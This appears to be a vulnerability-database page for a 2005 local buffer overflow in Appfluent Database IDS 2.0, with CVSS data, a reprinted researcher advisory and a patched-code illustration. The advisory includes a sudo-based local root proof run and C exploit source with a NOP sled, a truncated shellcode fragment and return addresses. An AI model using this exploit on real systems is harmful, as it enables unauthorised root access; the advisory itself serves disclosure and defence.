Published: 2005-12-07 20:03:00
Revised: 2008-09-05 16:56:03

[Original text] Buffer overflow in Appfluent Technology Database IDS 2.0 allows local users to execute arbitrary code via a long APPFLUENT_HOME environment variable.

[CNNVD] Appfluent Technology Database IDS APPFLUENT_HOME Variable Buffer Overflow Vulnerability (CNNVD-200512-126)

        A buffer overflow vulnerability exists in Appfluent Technology Database IDS 2.0; a local user can execute arbitrary code via a long APPFLUENT_HOME environment variable.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  BID  15755
(UNKNOWN)  FULLDISC  20051207 Appfluent Batabase IDS Local Root

- Vulnerability information

Appfluent Technology Database IDS APPFLUENT_HOME Variable Buffer Overflow Vulnerability
Medium severity  Buffer overflow
2005-12-07 00:00:00 2005-12-07 00:00:00
        A buffer overflow vulnerability exists in Appfluent Technology Database IDS 2.0; a local user can execute arbitrary code via a long APPFLUENT_HOME environment variable.

- Advisories and patches


- Vulnerability information (1360)

Appfluent Database IDS < (Env Variable) Local Exploit (EDBID:1360)
solaris local
2005-12-07 Verified
0 c0ntex
N/A
  $ An open security advisory #14 - Appfluent Database IDS Environment Variable Overflow
  1: Bug Researcher: c0ntex - c0ntexb[at] -+-
  2: Bug Released: December 07th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Local root
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  Appfluent Database IDS v2.0

  "Appfluent Technology is the leading provider of data usage and query performance software designed to
  help IT organizations improve performance of Business Intelligence (BI) and enterprise applications,
  reduce the number of databases they maintain and quickly deploy new applications. Appfluent provides a
  suite of products that clean up and consolidate databases, optimize query performance based on usage,
  and rapidly analyze applications for both test and production environments."
  Appfluent provide a Database IDS system that monitors all SQL traffic in real time, logging every user
  defined transaction to a database, providing an audit trail of all transactions that take place. There
  are several processes that accumulate together to provide the IDS solution, including watcher, analyser,
  alerter and reporter.

  There is a stack based buffer overflow in all binaries that allows a malicious attacker to gain
  unauthorised code execution on the system where the application is installed. Due to incorrect use of
  strcpy(), and a lack of correct bounds checking, a user can manipulate the $APPFLUENT_HOME environment
  variable to overflow the stack buffer.

  The problem is specific to the watcher process, as it needs to be run as root due to the fact that it
  sniffs all traffic going to an interface. A script installed in $APPFLUENT_HOME/server_oracle/bin is
  supplied so that administrators can run the process via sudo.

  When run with sudo, we are provided a vector for root compromise as a default sudo install on Solaris
  (this example) and other operating systems honour the setting of environment variables. As such, when
  an attacker crafts $APPFLUENT_HOME in a malicious manner and runs the watcher process, root access to
  the system is gained.

  There are a few requirements that need to be met for the attack to be successful, and they include:

  	1) User is in the sudoers file and is defined as able to run the watcher process
  	2) Sudo honours environment variables, meaning env_reset or the likes is not set

  Please note that users must set, or have $APPFLUENT_HOME set for the product to work, and if the above
  two requirements are met, an attacker is guaranteed to gain unauthorised root access to the system.

  Appfluent have released a fix, which is provided in the latest version of the product => Ver:

  ## Proof run with a default sudo install from sunfreeware.
  [c0ntex@ ~/vuln]$ export SHELLCODE=`printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
  [c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print "A" x 576'``printf "\xff\xbe
  [c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc
  do_process: Exception:
    file: file_stream.cpp
    line: 338
  /config/config : 78 : File name too long
    code: 78
  #0  void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35
  #1  virtual void IC::ServerConfig::load() at /home/ask/lab/v2_0/app/product/server/lib/libserverconfig/server_config.cpp:70
  #2  virtual void IC::Watch::run(bool, bool) at /home/ask/lab/v2_0/app/product/server/lib/libwatch/watch.cpp:41
  #3  int do_process(bool) at /home/ask/lab/v2_0/app/product/server/bin/watch/do_process.cpp:21

  # uname -a
  SunOS  5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
  # id -a
  uid=0(root) gid=1(other) groups=1(other),0(root),2(bin),3(sys),4(adm),5(uucp),6(mail

  Greetings to everyone I know  ;-)


  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>

  #define DAHBUF   591
  #define NOP      0x90
  #define SUDO     "/usr/local/bin/sudo"
  #define VULN     "watcher"
  #define WOPT     "-sc"

  /* The page's copy of the shellcode is cut off after its first line; only the
     fragment shown there is reproduced. */
  char shellcode[] = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20";

  char retloc[] = "\xff\xbe\xfd\xe9";
  char retlok[] = "\xff\xbe\xfd\xed";

  int main()
  {
        char env[DAHBUF+9];

        puts("\nLocal root proof of concept for Appfluent IDS Watcher environment overflow");
        puts("found and developed by c0ntex || ||\n");

        /* NOP sled, shellcode fragment, then the two return-address candidates */
        memset(env, NOP, DAHBUF);

        memcpy(env + 100, shellcode, strlen(shellcode));
        memcpy(env + DAHBUF, retloc, strlen(retloc));
        memcpy(env + DAHBUF + 4, retlok, strlen(retlok));
        env[DAHBUF+8] = '\0';   /* last valid index; the page's DAHBUF+9 wrote one byte past the array */

        strncpy(&env[0], "APPFLUENT_HOME=", 15);

        /* The page's copy reads "if(!env)", which can never be true for an array. The
           variable has to be placed in the environment that execl() hands on, so
           putenv() is assumed here to be the intended call. */
        if(putenv(env) != 0) {
                perror("putenv");
                exit(1);
        }

        if(execl(SUDO, SUDO, VULN, WOPT, NULL) < 0) {
                perror("execl");
                exit(1);
        }

        return 0;
  }

// [2005-12-07]
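The weak pattern the advisory describes (an unbounded strcpy() of $APPFLUENT_HOME into a stack buffer while the config path from the trace above is built) beside a bounded replacement that rejects an overlong value, as an added example that is not code from the advisory, Appfluent or CNNVD. HOME_MAX, build_config_path, config_path_from_env and the sample inputs are constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOME_MAX   256              /* constructed limit for this example */
#define CONFIG_REL "/config/config" /* suffix seen in the advisory's trace */

/* Weak pattern from the advisory: the variable's length is never checked, so a
 * value longer than the stack buffer overwrites what follows it on the stack.
 *     char path[HOME_MAX];
 *     strcpy(path, getenv("APPFLUENT_HOME"));   // no bound
 *     strcat(path, CONFIG_REL);
 *
 * Bounded replacement: treat APPFLUENT_HOME as untrusted input. Returns 0 and
 * writes the path into out on success; returns -1 (out left empty) if home is
 * unset, not an absolute path, longer than HOME_MAX, or would not fit in out. */
int build_config_path(const char *home, char *out, size_t outlen)
{
    if (outlen == 0)
        return -1;
    out[0] = '\0';
    if (home == NULL || home[0] != '/')
        return -1;                          /* unset or relative: refuse */
    if (strlen(home) > HOME_MAX)
        return -1;                          /* e.g. the 576-byte value in the PoC */
    int n = snprintf(out, outlen, "%s%s", home, CONFIG_REL);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';                      /* snprintf would have truncated */
        return -1;
    }
    return 0;
}

/* Reads the variable from the process environment, as the watcher does. */
int config_path_from_env(char *out, size_t outlen)
{
    return build_config_path(getenv("APPFLUENT_HOME"), out, outlen);
}

int main(void)
{
    char path[HOME_MAX + sizeof CONFIG_REL];
    char overlong[577];                     /* constructed: 576 x 'A', as in the PoC */
    memset(overlong, 'A', 576);
    overlong[576] = '\0';

    int rc = build_config_path("/opt/appfluent", path, sizeof path);
    printf("normal   -> %d %s\n", rc, path);
    rc = build_config_path(overlong, path, sizeof path);
    printf("overlong -> %d (rejected before any copy)\n", rc);
    return 0;
}
```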

- Vulnerability information

Appfluent Technology Database IDS watcher APPFLUENT_HOME Variable Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-12-07 Unknown
2005-12-07 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Appfluent Technology Database IDS APPFLUENT_HOME Variable Buffer Overflow Vulnerability
Boundary Condition Error 15755
No Yes
2005-12-07 12:00:00 2005-12-07 12:00:00
Discovered by c0ntex <>.

- Affected program versions

Appfluent Technology Database IDS 2.0
Appfluent Technology Database IDS 2.1.0.103

- Unaffected program versions

Appfluent Technology Database IDS 2.1.0.103

- Vulnerability discussion

Appfluent Technology Database IDS is prone to a local buffer overflow vulnerability.

This issue presents itself when the affected application handles a malformed value passed through the APPFLUENT_HOME environment variable.

A successful attack can allow an attacker to execute arbitrary code on the affected computer. A complete compromise may be possible as well.

Appfluent Technology Database IDS 2.0 is reported to be vulnerable. Other versions may be affected as well.

- Exploit

The following exploit is available:

- Solution

Reports indicate that this issue has been addressed in Appfluent Database IDS. This could not be confirmed by Symantec.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: <>.

- References